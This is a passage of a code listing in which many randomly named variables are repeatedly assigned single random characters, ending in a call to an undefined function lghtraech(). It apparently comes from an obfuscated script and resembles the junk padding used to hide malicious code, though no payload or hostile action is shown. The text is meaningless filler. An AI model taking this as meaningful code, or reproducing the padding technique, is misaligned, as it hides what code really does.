677 | qnkhpypfp = "u"; | |
678 | qnkhpypfp = "y"; | |
679 | qnkhpypfp = "K"; | |
680 | qnkhpypfp = "z"; | |
681 | qnkhpypfp = "U"; | |
682 | qnkhpypfp = "s"; | |
683 | qnkhpypfp = "m"; | |
684 | qnkhpypfp = "W"; | |
685 | qnkhpypfp = "E"; | |
686 | qnkhpypfp = "m"; | |
687 | qnkhpypfp = "Z"; | |
688 | qnkhpypfp = "d"; | |
689 | qnkhpypfp = "R"; | |
690 | qnkhpypfp = "A"; | |
691 | qnkhpypfp = "m"; | |
692 | atrvldci = "R"; | |
693 | atrvldci = "r"; | |
694 | atrvldci = "K"; | |
695 | atrvldci = "r"; | |
696 | atrvldci = "V"; | |
697 | atrvldci = "y"; | |
698 | atrvldci = "l"; | |
699 | atrvldci = "h"; | |
700 | atrvldci = "V"; | |
701 | atrvldci = "i"; | |
702 | atrvldci = "I"; | |
703 | atrvldci = "f"; | |
704 | atrvldci = "B"; | |
705 | atrvldci = "u"; | |
706 | atrvldci = "U"; | |
707 | atrvldci = "j"; | |
708 | atrvldci = "k"; | |
709 | atrvldci = "S"; | |
710 | atrvldci = "k"; | |
711 | atrvldci = "S"; | |
712 | atrvldci = "t"; | |
713 | atrvldci = "B"; | |
714 | atrvldci = "C"; | |
715 | atrvldci = "b"; | |
716 | atrvldci = "y"; | |
717 | atrvldci = "c"; | |
718 | atrvldci = "B"; | |
719 | atrvldci = "P"; | |
720 | atrvldci = "P"; | |
721 | atrvldci = "O"; | |
722 | atrvldci = "W"; | |
723 | atrvldci = "k"; | |
724 | atrvldci = "T"; | |
725 | atrvldci = "O"; | |
726 | atrvldci = " "; | |
727 | kfhiobfa = "L"; | |
728 | kfhiobfa = "a"; | |
729 | kfhiobfa = "S"; | |
730 | kfhiobfa = "D"; | |
731 | kfhiobfa = "h"; | |
732 | kfhiobfa = "H"; | |
733 | kfhiobfa = "F"; | |
734 | kfhiobfa = "s"; | |
735 | kfhiobfa = "k"; | |
736 | kfhiobfa = "s"; | |
737 | kfhiobfa = "z"; | |
738 | kfhiobfa = "m"; | |
739 | kfhiobfa = "w"; | |
740 | kfhiobfa = "g"; | |
741 | kfhiobfa = "H"; | |
742 | kfhiobfa = "q"; | |
743 | kfhiobfa = "K"; | |
744 | kfhiobfa = "b"; | |
745 | kfhiobfa = "z"; | |
746 | kfhiobfa = "l"; | |
747 | kfhiobfa = "q"; | |
748 | kfhiobfa = "z"; | |
749 | kfhiobfa = "i"; | |
750 | kfhiobfa = "Y"; | |
751 | kfhiobfa = "Y"; | |
752 | kfhiobfa = "H"; | |
753 | kfhiobfa = "I"; | |
754 | kfhiobfa = "C"; | |
755 | kfhiobfa = "i"; | |
756 | kfhiobfa = "Y"; | |
757 | kfhiobfa = "y"; | |
758 | kfhiobfa = "Y"; | |
759 | kfhiobfa = "b"; | |
760 | kfhiobfa = "Q"; | |
761 | kfhiobfa = "Y"; | |
762 | kfhiobfa = "X"; | |
763 | kfhiobfa = "T"; | |
764 | kfhiobfa = "q"; | |
765 | kfhiobfa = "z"; | |
766 | kfhiobfa = "@"; | |
767 | bvqexg = "y"; | |
768 | bvqexg = "z"; | |
769 | bvqexg = "i"; | |
770 | bvqexg = "n"; | |
771 | bvqexg = "B"; | |
772 | bvqexg = "t"; | |
773 | bvqexg = "Y"; | |
774 | bvqexg = "M"; | |
775 | bvqexg = "W"; | |
776 | bvqexg = "N"; | |
777 | bvqexg = "R"; | |
778 | bvqexg = "h"; | |
779 | xhnfp = "h"; | |
780 | xhnfp = "t"; | |
781 | xhnfp = "j"; | |
782 | xhnfp = "e"; | |
783 | xhnfp = "h"; | |
784 | xhnfp = "w"; | |
785 | xhnfp = "w"; | |
786 | xhnfp = "L"; | |
787 | xhnfp = "D"; | |
788 | xhnfp = "p"; | |
789 | xhnfp = "f"; | |
790 | xhnfp = "z"; | |
791 | xhnfp = "T"; | |
792 | xhnfp = "c"; | |
793 | xhnfp = "E"; | |
794 | xhnfp = "R"; | |
795 | xhnfp = "j"; | |
796 | xhnfp = "J"; | |
797 | xhnfp = "a"; | |
798 | xhnfp = "Q"; | |
799 | xhnfp = "G"; | |
800 | xhnfp = "n"; | |
801 | xhnfp = "P"; | |
802 | xhnfp = "g"; | |
803 | xhnfp = "A"; | |
804 | xhnfp = "o"; | |
805 | hjatdli = "t"; | |
806 | hjatdli = "a"; | |
807 | hjatdli = "m"; | |
808 | hjatdli = "x"; | |
809 | hjatdli = "I"; | |
810 | hjatdli = "l"; | |
811 | hjatdli = "v"; | |
812 | hjatdli = "y"; | |
813 | hjatdli = "s"; | |
814 | hjatdli = "Q"; | |
815 | hjatdli = "i"; | |
816 | hjatdli = "X"; | |
817 | hjatdli = "I"; | |
818 | hjatdli = "F"; | |
819 | hjatdli = "F"; | |
820 | hjatdli = "S"; | |
821 | hjatdli = "r"; | |
822 | hjatdli = "e"; | |
823 | uacrwgd = "J"; | |
824 | uacrwgd = "u"; | |
825 | uacrwgd = "r"; | |
826 | uacrwgd = "c"; | |
827 | uacrwgd = "o"; | |
828 | uacrwgd = "f"; | |
829 | uacrwgd = "E"; | |
830 | uacrwgd = "A"; | |
831 | uacrwgd = "h"; | |
832 | uacrwgd = "X"; | |
833 | uacrwgd = "X"; | |
834 | uacrwgd = "n"; | |
835 | uacrwgd = "C"; | |
836 | uacrwgd = "x"; | |
837 | uacrwgd = "z"; | |
838 | uacrwgd = "j"; | |
839 | uacrwgd = "p"; | |
840 | uacrwgd = "q"; | |
841 | uacrwgd = "d"; | |
842 | uacrwgd = "O"; | |
843 | uacrwgd = "M"; | |
844 | uacrwgd = "D"; | |
845 | uacrwgd = "J"; | |
846 | uacrwgd = "g"; | |
847 | uacrwgd = "p"; | |
848 | uacrwgd = "u"; | |
849 | uacrwgd = "b"; | |
850 | uacrwgd = "b"; | |
851 | uacrwgd = "M"; | |
852 | uacrwgd = "l"; | |
853 | uacrwgd = "A"; | |
854 | uacrwgd = "k"; | |
855 | uacrwgd = "K"; | |
856 | uacrwgd = "n"; | |
857 | uacrwgd = "&"; | |
858 | ubbuzgk = "T"; | |
859 | ubbuzgk = "a"; | |
860 | ubbuzgk = "i"; | |
861 | ubbuzgk = "D"; | |
862 | ubbuzgk = "M"; | |
863 | ubbuzgk = "L"; | |
864 | ubbuzgk = "j"; | |
865 | ubbuzgk = "h"; | |
866 | ubbuzgk = "N"; | |
867 | ubbuzgk = "X"; | |
868 | ubbuzgk = "e"; | |
869 | ubbuzgk = "c"; | |
870 | ubbuzgk = "Q"; | |
871 | ubbuzgk = "x"; | |
872 | ubbuzgk = "K"; | |
873 | ubbuzgk = "Q"; | |
874 | ubbuzgk = "x"; | |
875 | ubbuzgk = "w"; | |
876 | ubbuzgk = "Q"; | |
877 | ubbuzgk = "y"; | |
878 | ubbuzgk = "h"; | |
879 | ubbuzgk = "K"; | |
880 | ubbuzgk = "Y"; | |
881 | ubbuzgk = "y"; | |
882 | ubbuzgk = "U"; | |
883 | ubbuzgk = "f"; | |
884 | ubbuzgk = "x"; | |
885 | ubbuzgk = "u"; | |
886 | ubbuzgk = "s"; | |
887 | ubbuzgk = "n"; | |
888 | ubbuzgk = "n"; | |
889 | ubbuzgk = "p"; | |
890 | ubbuzgk = "w"; | |
891 | ubbuzgk = "x"; | |
892 | ubbuzgk = "9"; | |
893 | bmwqb = "k"; | |
894 | bmwqb = "E"; | |
895 | bmwqb = "e"; | |
896 | bmwqb = "y"; | |
897 | bmwqb = "l"; | |
898 | bmwqb = "Y"; | |
899 | bmwqb = "c"; | |
900 | bmwqb = "t"; | |
901 | bmwqb = "E"; | |
902 | bmwqb = "d"; | |
903 | bmwqb = "v"; | |
904 | bmwqb = "J"; | |
905 | bmwqb = "j"; | |
906 | bmwqb = "K"; | |
907 | bmwqb = "k"; | |
908 | bmwqb = "U"; | |
909 | bmwqb = "F"; | |
910 | bmwqb = "H"; | |
911 | bmwqb = "Q"; | |
912 | bmwqb = "l"; | |
913 | bmwqb = "c"; | |
914 | bmwqb = "q"; | |
915 | bmwqb = "r"; | |
916 | bmwqb = "o"; | |
917 | bmwqb = "p"; | |
918 | bmwqb = "f"; | |
919 | bmwqb = "h"; | |
920 | bmwqb = "O"; | |
921 | bmwqb = "a"; | |
922 | bmwqb = "b"; | |
923 | bmwqb = "T"; | |
924 | bmwqb = "L"; | |
925 | bmwqb = "V"; | |
926 | bmwqb = "P"; | |
927 | bmwqb = "l"; | |
928 | bmwqb = "x"; | |
929 | bmwqb = "H"; | |
930 | bmwqb = "C"; | |
931 | bmwqb = "F"; | |
932 | bmwqb = "c"; | |
933 | bmwqb = "R"; | |
934 | bmwqb = "x"; | |
935 | bmwqb = "x"; | |
936 | bmwqb = "v"; | |
937 | bmwqb = "k"; | |
938 | ygjoeis = "H"; | |
939 | ygjoeis = "h"; | |
940 | ygjoeis = "A"; | |
941 | ygjoeis = "Z"; | |
942 | ygjoeis = "w"; | |
943 | ygjoeis = "S"; | |
944 | ygjoeis = "i"; | |
945 | ygjoeis = "g"; | |
946 | ygjoeis = "S"; | |
947 | ygjoeis = "z"; | |
948 | ygjoeis = "V"; | |
949 | ygjoeis = "k"; | |
950 | ygjoeis = "j"; | |
951 | ygjoeis = "i"; | |
952 | ygjoeis = "F"; | |
953 | ygjoeis = "x"; | |
954 | ygjoeis = "s"; | |
955 | ygjoeis = "V"; | |
956 | ygjoeis = "b"; | |
957 | ygjoeis = "a"; | |
958 | ygjoeis = "V"; | |
959 | ygjoeis = "f"; | |
960 | ygjoeis = "V"; | |
961 | ygjoeis = "I"; | |
962 | ygjoeis = "P"; | |
963 | ygjoeis = "K"; | |
964 | ygjoeis = "q"; | |
965 | ygjoeis = "B"; | |
966 | ygjoeis = "t"; | |
967 | rdplh = "H"; | |
968 | rdplh = "Q"; | |
969 | rdplh = "J"; | |
970 | rdplh = "J"; | |
971 | rdplh = "R"; | |
972 | rdplh = "B"; | |
973 | rdplh = "e"; | |
974 | rdplh = "S"; | |
975 | rdplh = "l"; | |
976 | rdplh = "t"; | |
977 | rdplh = "U"; | |
978 | rdplh = "P"; | |
979 | rdplh = "j"; | |
980 | rdplh = "k"; | |
981 | rdplh = "U"; | |
982 | rdplh = "C"; | |
983 | rdplh = "K"; | |
984 | rdplh = "p"; | |
985 | rdplh = "o"; | |
986 | rdplh = "G"; | |
987 | rdplh = "f"; | |
988 | rdplh = "n"; | |
989 | rdplh = "H"; | |
990 | rdplh = "y"; | |
991 | rdplh = "j"; | |
992 | rdplh = "i"; | |
993 | rdplh = "F"; | |
994 | rdplh = "%"; | |
995 | cwzlpur = "I"; | |
996 | cwzlpur = "A"; | |
997 | cwzlpur = "o"; | |
998 | cwzlpur = "O"; | |
999 | cwzlpur = "R"; | |
1000 | casztboll = "z"; | |
1001 | casztboll = "y"; | |
1002 | casztboll = "y"; | |
1003 | casztboll = "b"; | |
1004 | casztboll = "a"; | |
1005 | casztboll = "U"; | |
1006 | casztboll = "S"; | |
1007 | casztboll = "O"; | |
1008 | casztboll = "H"; | |
1009 | casztboll = "g"; | |
1010 | casztboll = "O"; | |
1011 | casztboll = "r"; | |
1012 | casztboll = "F"; | |
1013 | casztboll = "j"; | |
1014 | pqbnl = "k"; | |
1015 | pqbnl = "F"; | |
1016 | pqbnl = "A"; | |
1017 | pqbnl = "d"; | |
1018 | pqbnl = "P"; | |
1019 | pqbnl = "d"; | |
1020 | pqbnl = "Z"; | |
1021 | pqbnl = "F"; | |
1022 | pqbnl = "x"; | |
1023 | pqbnl = "f"; | |
1024 | pqbnl = "j"; | |
1025 | pqbnl = "m"; | |
1026 | pqbnl = "c"; | |
1027 | pqbnl = "G"; | |
1028 | pqbnl = "8"; | |
1029 | fcikmx = "e"; | |
1030 | fcikmx = "s"; | |
1031 | fcikmx = "w"; | |
1032 | ziivctc = "t"; | |
1033 | ziivctc = "l"; | |
1034 | ziivctc = "x"; | |
1035 | ziivctc = "K"; | |
1036 | ziivctc = "g"; | |
1037 | wadafjt = "e"; | |
1038 | wadafjt = "u"; | |
1039 | wadafjt = "P"; | |
1040 | wadafjt = "m"; | |
1041 | wadafjt = "b"; | |
1042 | wadafjt = "s"; | |
1043 | wadafjt = "y"; | |
1044 | wadafjt = "w"; | |
1045 | wadafjt = "j"; | |
1046 | wadafjt = "L"; | |
1047 | wadafjt = "r"; | |
1048 | wadafjt = "h"; | |
1049 | wadafjt = "o"; | |
1050 | wadafjt = "U"; | |
1051 | wadafjt = "K"; | |
1052 | wadafjt = "W"; | |
1053 | wadafjt = "T"; | |
1054 | wadafjt = "s"; | |
1055 | wadafjt = "g"; | |
1056 | wadafjt = "s"; | |
1057 | wadafjt = "T"; | |
1058 | wadafjt = "L"; | |
1059 | wadafjt = "m"; | |
1060 | wadafjt = "K"; | |
1061 | wadafjt = "K"; | |
1062 | wadafjt = "W"; | |
1063 | wadafjt = "T"; | |
1064 | wadafjt = "j"; | |
1065 | wadafjt = "K"; | |
1066 | wadafjt = "K"; | |
1067 | wzyadazbm = "c"; | |
1068 | wzyadazbm = "R"; | |
1069 | wzyadazbm = "I"; | |
1070 | wzyadazbm = "Q"; | |
1071 | wzyadazbm = "z"; | |
1072 | wzyadazbm = "M"; | |
1073 | wzyadazbm = "u"; | |
1074 | wzyadazbm = "f"; | |
1075 | wzyadazbm = "S"; | |
1076 | wzyadazbm = "i"; | |
1077 | wzyadazbm = "e"; | |
1078 | wzyadazbm = "F"; | |
1079 | wzyadazbm = "j"; | |
1080 | wzyadazbm = "q"; | |
1081 | wzyadazbm = "a"; | |
1082 | wzyadazbm = "K"; | |
1083 | wzyadazbm = "B"; | |
1084 | wzyadazbm = "V"; | |
1085 | wzyadazbm = "D"; | |
1086 | wzyadazbm = "Y"; | |
1087 | wzyadazbm = "l"; | |
1088 | wzyadazbm = "c"; | |
1089 | wzyadazbm = "z"; | |
1090 | wzyadazbm = "S"; | |
1091 | wzyadazbm = "y"; | |
1092 | wzyadazbm = "l"; | |
1093 | wzyadazbm = "K"; | |
1094 | wzyadazbm = "s"; | |
1095 | wzyadazbm = "s"; | |
1096 | wzyadazbm = "O"; | |
1097 | wzyadazbm = "L"; | |
1098 | wzyadazbm = "t"; | |
1099 | wzyadazbm = "e"; | |
1100 | wzyadazbm = "c"; | |
1101 | wzyadazbm = "f"; | |
1102 | wzyadazbm = "X"; | |
1103 | wzyadazbm = "k"; | |
1104 | wzyadazbm = "E"; | |
1105 | wzyadazbm = "J"; | |
1106 | wzyadazbm = "s"; | |
1107 | wzyadazbm = "L"; | |
1108 | wzyadazbm = "Q"; | |
1109 | wzyadazbm = "N"; | |
1110 | wzyadazbm = "X"; | |
1111 | wzyadazbm = "H"; | |
1112 | ipnpukocr = "X"; | |
1113 | ipnpukocr = "J"; | |
1114 | ipnpukocr = "U"; | |
1115 | ipnpukocr = "L"; | |
1116 | ipnpukocr = "T"; | |
1117 | ipnpukocr = "D"; | |
1118 | ipnpukocr = "V"; | |
1119 | ipnpukocr = "Y"; | |
1120 | ipnpukocr = "r"; | |
1121 | ipnpukocr = "B"; | |
1122 | ipnpukocr = "a"; | |
1123 | ipnpukocr = "o"; | |
1124 | ipnpukocr = "h"; | |
1125 | ipnpukocr = "R"; | |
1126 | ipnpukocr = "j"; | |
1127 | ipnpukocr = "p"; | |
1128 | ipnpukocr = "p"; | |
1129 | ipnpukocr = "-"; | |
1130 | ybcgub = "w"; | |
1131 | ybcgub = "t"; | |
1132 | ybcgub = "T"; | |
1133 | ybcgub = "I"; | |
1134 | ybcgub = "Q"; | |
1135 | ybcgub = "m"; | |
1136 | ybcgub = "H"; | |
1137 | ybcgub = "v"; | |
1138 | ybcgub = "L"; | |
1139 | ybcgub = "f"; | |
1140 | ybcgub = "H"; | |
1141 | ybcgub = "r"; | |
1142 | ybcgub = "n"; | |
1143 | ybcgub = "G"; | |
1144 | ybcgub = "Z"; | |
1145 | ybcgub = "o"; | |
1146 | ybcgub = "a"; | |
1147 | ybcgub = "q"; | |
1148 | ybcgub = "i"; | |
1149 | ybcgub = "P"; | |
1150 | ybcgub = "C"; | |
1151 | vpnhqrmcv = "C"; | |
1152 | vpnhqrmcv = "f"; | |
1153 | vpnhqrmcv = "V"; | |
1154 | vpnhqrmcv = "Z"; | |
1155 | vpnhqrmcv = "q"; | |
1156 | vpnhqrmcv = "R"; | |
1157 | vpnhqrmcv = "L"; | |
1158 | vpnhqrmcv = "u"; | |
1159 | vpnhqrmcv = "e"; | |
1160 | vpnhqrmcv = "g"; | |
1161 | vpnhqrmcv = "y"; | |
1162 | vpnhqrmcv = "D"; | |
1163 | vpnhqrmcv = "e"; | |
1164 | vpnhqrmcv = "y"; | |
1165 | vpnhqrmcv = "B"; | |
1166 | vpnhqrmcv = "B"; | |
1167 | vpnhqrmcv = "P"; | |
1168 | vpnhqrmcv = "T"; | |
1169 | vpnhqrmcv = "g"; | |
1170 | vpnhqrmcv = "b"; | |
1171 | vpnhqrmcv = "b"; | |
1172 | vpnhqrmcv = "D"; | |
1173 | vpnhqrmcv = "B"; | |
1174 | vpnhqrmcv = "o"; | |
1175 | vpnhqrmcv = "z"; | |
1176 | vpnhqrmcv = "A"; | |
1177 | vpnhqrmcv = "T"; | |
1178 | vpnhqrmcv = "U"; | |
1179 | vpnhqrmcv = "h"; | |
1180 | vpnhqrmcv = "g"; | |
1181 | vpnhqrmcv = "E"; | |
1182 | vpnhqrmcv = "N"; | |
1183 | vpnhqrmcv = "p"; | |
1184 | vpnhqrmcv = "w"; | |
1185 | vpnhqrmcv = "h"; | |
1186 | vpnhqrmcv = "0"; | |
1187 | iqjifah = "m"; | |
1188 | iqjifah = "M"; | |
1189 | iqjifah = "a"; | |
1190 | iqjifah = "a"; | |
1191 | iqjifah = "M"; | |
1192 | iqjifah = "W"; | |
1193 | iqjifah = "f"; | |
1194 | iqjifah = "a"; | |
1195 | iqjifah = "d"; | |
1196 | iqjifah = "n"; | |
1197 | iqjifah = "A"; | |
1198 | iqjifah = "G"; | |
1199 | iqjifah = "b"; | |
1200 | iqjifah = "G"; | |
1201 | iqjifah = "r"; | |
1202 | iqjifah = "C"; | |
1203 | iqjifah = "z"; | |
1204 | iqjifah = "x"; | |
1205 | aaoxyui = "r"; | |
1206 | rxbgtmdgh = "p"; | |
1207 | rxbgtmdgh = "c"; | |
1208 | rxbgtmdgh = "Z"; | |
1209 | rxbgtmdgh = "T"; | |
1210 | rxbgtmdgh = "x"; | |
1211 | rxbgtmdgh = "C"; | |
1212 | rxbgtmdgh = "Y"; | |
1213 | rxbgtmdgh = "P"; | |
1214 | rxbgtmdgh = "v"; | |
1215 | rxbgtmdgh = "w"; | |
1216 | rxbgtmdgh = "m"; | |
1217 | rxbgtmdgh = "U"; | |
1218 | rxbgtmdgh = "s"; | |
1219 | rxbgtmdgh = "Y"; | |
1220 | rxbgtmdgh = "C"; | |
1221 | rxbgtmdgh = "o"; | |
1222 | rxbgtmdgh = "t"; | |
1223 | rxbgtmdgh = "F"; | |
1224 | rxbgtmdgh = "j"; | |
1225 | rxbgtmdgh = "J"; | |
1226 | rxbgtmdgh = "V"; | |
1227 | rxbgtmdgh = "J"; | |
1228 | rxbgtmdgh = "B"; | |
1229 | rxbgtmdgh = "I"; | |
1230 | rxbgtmdgh = "d"; | |
1231 | rxbgtmdgh = "s"; | |
1232 | rxbgtmdgh = "T"; | |
1233 | rxbgtmdgh = "O"; | |
1234 | rxbgtmdgh = "L"; | |
1235 | rxbgtmdgh = "p"; | |
1236 | rxbgtmdgh = "Y"; | |
1237 | rxbgtmdgh = "Q"; | |
1238 | rxbgtmdgh = "A"; | |
1239 | rxbgtmdgh = "s"; | |
1240 | rxbgtmdgh = "t"; | |
1241 | rxbgtmdgh = "v"; | |
1242 | rxbgtmdgh = "\\"; | |
1243 | swpfsne = "Q"; | |
1244 | swpfsne = "E"; | |
1245 | msler = "E"; | |
1246 | msler = "e"; | |
1247 | msler = "G"; | |
1248 | msler = "F"; | |
1249 | msler = "d"; | |
1250 | owexfhgz = "A"; | |
1251 | owexfhgz = "H"; | |
1252 | owexfhgz = "h"; | |
1253 | owexfhgz = "w"; | |
1254 | owexfhgz = "c"; | |
1255 | owexfhgz = "C"; | |
1256 | owexfhgz = "H"; | |
1257 | owexfhgz = "Y"; | |
1258 | rvvkwayph = "B"; | |
1259 | rvvkwayph = "b"; | |
1260 | rvvkwayph = "J"; | |
1261 | rvvkwayph = "m"; | |
1262 | rvvkwayph = "q"; | |
1263 | rvvkwayph = "k"; | |
1264 | rvvkwayph = "v"; | |
1265 | rvvkwayph = "d"; | |
1266 | rvvkwayph = "i"; | |
1267 | rvvkwayph = "c"; | |
1268 | rvvkwayph = "Z"; | |
1269 | rvvkwayph = "C"; | |
1270 | rvvkwayph = "z"; | |
1271 | rvvkwayph = "d"; | |
1272 | rvvkwayph = "i"; | |
1273 | rvvkwayph = "B"; | |
1274 | rvvkwayph = "M"; | |
1275 | rvvkwayph = "o"; | |
1276 | rvvkwayph = "a"; | |
1277 | rvvkwayph = "h"; | |
1278 | rvvkwayph = "l"; | |
1279 | rvvkwayph = "H"; | |
1280 | rvvkwayph = "B"; | |
1281 | rvvkwayph = "P"; | |
1282 | rvvkwayph = "S"; | |
1283 | rvvkwayph = "S"; | |
1284 | rvvkwayph = "E"; | |
1285 | rvvkwayph = "K"; | |
1286 | rvvkwayph = "S"; | |
1287 | rvvkwayph = "p"; | |
1288 | rvvkwayph = "O"; | |
1289 | rvvkwayph = "H"; | |
1290 | rvvkwayph = "O"; | |
1291 | rvvkwayph = "V"; | |
1292 | rvvkwayph = "J"; | |
1293 | rvvkwayph = "Z"; | |
1294 | rvvkwayph = "t"; | |
1295 | rvvkwayph = "q"; | |
1296 | rvvkwayph = "k"; | |
1297 | rvvkwayph = "z"; | |
1298 | rvvkwayph = "z"; | |
1299 | rvvkwayph = "s"; | |
1300 | amiqtj = "e"; | |
1301 | amiqtj = "x"; | |
1302 | amiqtj = "B"; | |
1303 | amiqtj = "P"; | |
1304 | amiqtj = "Y"; | |
1305 | amiqtj = "b"; | |
1306 | amiqtj = "H"; | |
1307 | amiqtj = "z"; | |
1308 | amiqtj = "A"; | |
1309 | amiqtj = "s"; | |
1310 | amiqtj = "X"; | |
1311 | amiqtj = "O"; | |
1312 | amiqtj = "U"; | |
1313 | amiqtj = "j"; | |
1314 | amiqtj = "U"; | |
1315 | amiqtj = "L"; | |
1316 | amiqtj = "C"; | |
1317 | amiqtj = "W"; | |
1318 | amiqtj = "x"; | |
1319 | amiqtj = "z"; | |
1320 | amiqtj = "K"; | |
1321 | amiqtj = "Y"; | |
1322 | amiqtj = "H"; | |
1323 | amiqtj = "J"; | |
1324 | amiqtj = "B"; | |
1325 | amiqtj = "b"; | |
1326 | amiqtj = "W"; | |
1327 | amiqtj = "l"; | |
1328 | amiqtj = "q"; | |
1329 | amiqtj = "L"; | |
1330 | amiqtj = "b"; | |
1331 | amiqtj = "i"; | |
1332 | amiqtj = "N"; | |
1333 | amiqtj = "K"; | |
1334 | amiqtj = "g"; | |
1335 | amiqtj = "F"; | |
1336 | amiqtj = "g"; | |
1337 | amiqtj = "p"; | |
1338 | amiqtj = "n"; | |
1339 | amiqtj = "o"; | |
1340 | amiqtj = "A"; | |
1341 | amiqtj = "g"; | |
1342 | amiqtj = "E"; | |
1343 | amiqtj = "C"; | |
1344 | amiqtj = "S"; | |
1345 | cbyesbqb = "S"; | |
1346 | cbyesbqb = "k"; | |
1347 | cbyesbqb = "y"; | |
1348 | cbyesbqb = "e"; | |
1349 | cbyesbqb = "F"; | |
1350 | cbyesbqb = "Q"; | |
1351 | cbyesbqb = "y"; | |
1352 | cbyesbqb = "M"; | |
1353 | cbyesbqb = "F"; | |
1354 | cbyesbqb = "Q"; | |
1355 | cbyesbqb = "K"; | |
1356 | cbyesbqb = "q"; | |
1357 | cbyesbqb = "K"; | |
1358 | cbyesbqb = "l"; | |
1359 | cbyesbqb = "v"; | |
1360 | cbyesbqb = "z"; | |
1361 | cbyesbqb = "j"; | |
1362 | cbyesbqb = "q"; | |
1363 | cbyesbqb = "V"; | |
1364 | cbyesbqb = "v"; | |
1365 | cbyesbqb = "V"; | |
1366 | cbyesbqb = "b"; | |
1367 | cbyesbqb = "e"; | |
1368 | cbyesbqb = "y"; | |
1369 | cbyesbqb = "r"; | |
1370 | cbyesbqb = "X"; | |
1371 | cbyesbqb = "h"; | |
1372 | cbyesbqb = "z"; | |
1373 | cbyesbqb = "Y"; | |
1374 | cbyesbqb = "T"; | |
1375 | cbyesbqb = "z"; | |
1376 | cbyesbqb = "c"; | |
1377 | cbyesbqb = "N"; | |
1378 | cbyesbqb = "g"; | |
1379 | cbyesbqb = "V"; | |
1380 | cbyesbqb = "Y"; | |
1381 | cbyesbqb = "c"; | |
1382 | cbyesbqb = "b"; | |
1383 | vgucc = "z"; | |
1384 | vgucc = "v"; | |
1385 | vgucc = "u"; | |
1386 | vgucc = "t"; | |
1387 | vgucc = "l"; | |
1388 | vgucc = "H"; | |
1389 | vgucc = "P"; | |
1390 | vgucc = "R"; | |
1391 | vgucc = "c"; | |
1392 | vgucc = "r"; | |
1393 | vgucc = "g"; | |
1394 | vgucc = "E"; | |
1395 | vgucc = "V"; | |
1396 | vgucc = "P"; | |
1397 | vgucc = "a"; | |
1398 | vgucc = "C"; | |
1399 | vgucc = "v"; | |
1400 | vgucc = "J"; | |
1401 | vgucc = "H"; | |
1402 | vgucc = "s"; | |
1403 | vgucc = "h"; | |
1404 | vgucc = "q"; | |
1405 | vgucc = "v"; | |
1406 | vgucc = "H"; | |
1407 | vgucc = "a"; | |
1408 | vgucc = "Z"; | |
1409 | vgucc = "W"; | |
1410 | vgucc = "W"; | |
1411 | vgucc = "V"; | |
1412 | vgucc = "c"; | |
1413 | vgucc = "l"; | |
1414 | vgucc = "c"; | |
1415 | vgucc = "e"; | |
1416 | vgucc = "g"; | |
1417 | vgucc = "v"; | |
1418 | iwswu = "m"; | |
1419 | iwswu = "L"; | |
1420 | iwswu = "p"; | |
1421 | iwswu = "V"; | |
1422 | iwswu = "C"; | |
1423 | iwswu = "I"; | |
1424 | iwswu = "Z"; | |
1425 | iwswu = "I"; | |
1426 | iwswu = "K"; | |
1427 | iwswu = "o"; | |
1428 | iwswu = "l"; | |
1429 | iwswu = "i"; | |
1430 | iwswu = "z"; | |
1431 | iwswu = "m"; | |
1432 | iwswu = "P"; | |
1433 | iwswu = "\""; | |
1434 | qarnkdh = "o"; | |
1435 | qarnkdh = "J"; | |
1436 | qarnkdh = "E"; | |
1437 | qarnkdh = "J"; | |
1438 | qarnkdh = "a"; | |
1439 | qarnkdh = "g"; | |
1440 | qarnkdh = "W"; | |
1441 | qarnkdh = "h"; | |
1442 | qarnkdh = "h"; | |
1443 | qarnkdh = "H"; | |
1444 | qarnkdh = "j"; | |
1445 | qarnkdh = "h"; | |
1446 | qarnkdh = "q"; | |
1447 | qarnkdh = "Z"; | |
1448 | qarnkdh = "O"; | |
1449 | qarnkdh = "z"; | |
1450 | qarnkdh = "T"; | |
1451 | qarnkdh = "s"; | |
1452 | qarnkdh = "o"; | |
1453 | qarnkdh = "X"; | |
1454 | qarnkdh = "x"; | |
1455 | qarnkdh = "Y"; | |
1456 | qarnkdh = "a"; | |
1457 | qarnkdh = "J"; | |
1458 | qarnkdh = "z"; | |
1459 | qarnkdh = "Q"; | |
1460 | qarnkdh = "B"; | |
1461 | qarnkdh = "O"; | |
1462 | qarnkdh = "R"; | |
1463 | qarnkdh = "T"; | |
1464 | qarnkdh = "Z"; | |
1465 | qarnkdh = "J"; | |
1466 | qarnkdh = "e"; | |
1467 | qarnkdh = "B"; | |
1468 | qarnkdh = "Y"; | |
1469 | qarnkdh = "M"; | |
1470 | qarnkdh = "u"; | |
1471 | fioay = "h"; | |
1472 | fioay = "k"; | |
1473 | fioay = "e"; | |
1474 | fioay = "x"; | |
1475 | fioay = "A"; | |
1476 | fioay = "K"; | |
1477 | fioay = "p"; | |
1478 | fioay = "y"; | |
1479 | fioay = "Z"; | |
1480 | fioay = "e"; | |
1481 | fioay = "X"; | |
1482 | fioay = "s"; | |
1483 | fioay = "R"; | |
1484 | fioay = "l"; | |
1485 | fioay = "a"; | |
1486 | fioay = "i"; | |
1487 | fioay = "S"; | |
1488 | fioay = "x"; | |
1489 | fioay = "U"; | |
1490 | fioay = "c"; | |
1491 | fioay = "l"; | |
1492 | fioay = "G"; | |
1493 | fioay = "b"; | |
1494 | fioay = "x"; | |
1495 | fioay = "E"; | |
1496 | fioay = "g"; | |
1497 | fioay = "l"; | |
1498 | fioay = "i"; | |
1499 | fioay = "z"; | |
1500 | fioay = "t"; | |
1501 | fioay = "N"; | |
1502 | fioay = "p"; | |
1503 | fioay = "q"; | |
1504 | fioay = "o"; | |
1505 | fioay = "h"; | |
1506 | fioay = "a"; | |
1507 | fioay = "L"; | |
1508 | fioay = "b"; | |
1509 | fioay = "a"; | |
1510 | fioay = "n"; | |
1511 | fioay = "s"; | |
1512 | fioay = "G"; | |
1513 | fioay = "d"; | |
1514 | fioay = "D"; | |
1515 | fioay = "q"; | |
1516 | lghtraech ( ); |
|